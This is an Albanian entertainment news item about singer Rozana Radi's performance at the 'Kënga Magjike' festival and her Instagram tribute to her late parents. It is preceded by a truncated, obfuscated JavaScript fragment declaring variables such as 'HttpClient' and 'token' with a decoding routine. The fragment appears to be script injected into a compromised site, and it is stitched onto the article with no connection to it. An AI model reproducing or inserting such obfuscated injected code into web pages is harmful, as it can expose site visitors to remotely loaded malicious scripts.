;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Nuk mjaftoi shkëlqimi i mbrëmshëm që Rozana të ndjehet e lumtur! (FOTO)

By

Këngëtarja e njohur, Rozana Radi edhe këtë vit ka vendosur të marrë pjesë në festivalin e muzikës ‘Kënga Magjike’.

Projekti që ajo zgjodhi të sjelli doli të jetë mjaft i qëlluar pasi nga reagimet e para të publikut ai u prit mjaft mirë e u pëlqye edhe nga kritikët e kësaj sfere.

Mbrëmja e kaluar shënoi edhe nisjen e netëve finale të spektaklit ku u prezantuan shumë artistë e ndër to edhe Rozana e cila shkëlqeu me performancën e saj.

Por pavarësisht shkëlqimit të mbrëmshëm ajo ka ndjerë një mungesë mjaft të madhe në zemrën e saj.

Dita e sotme e zbardh më tepër rastin kur Rozi zgjedh përmes Instagramit të tregojë se mbrëmjen e kaluar i mungonin të dy prindrit tashmë të ndjerë.

Ky është edhe postimi i plotë nga ana e këngëtares: Doja te ishe aty mbrem bashke me mamin.E di qe me keni pare! Kishte nje drite mbrem qe me ndriconte .Ju dua perjete Mam Bab ❤️”  /Prive.al/

Artikuj të ngjashëm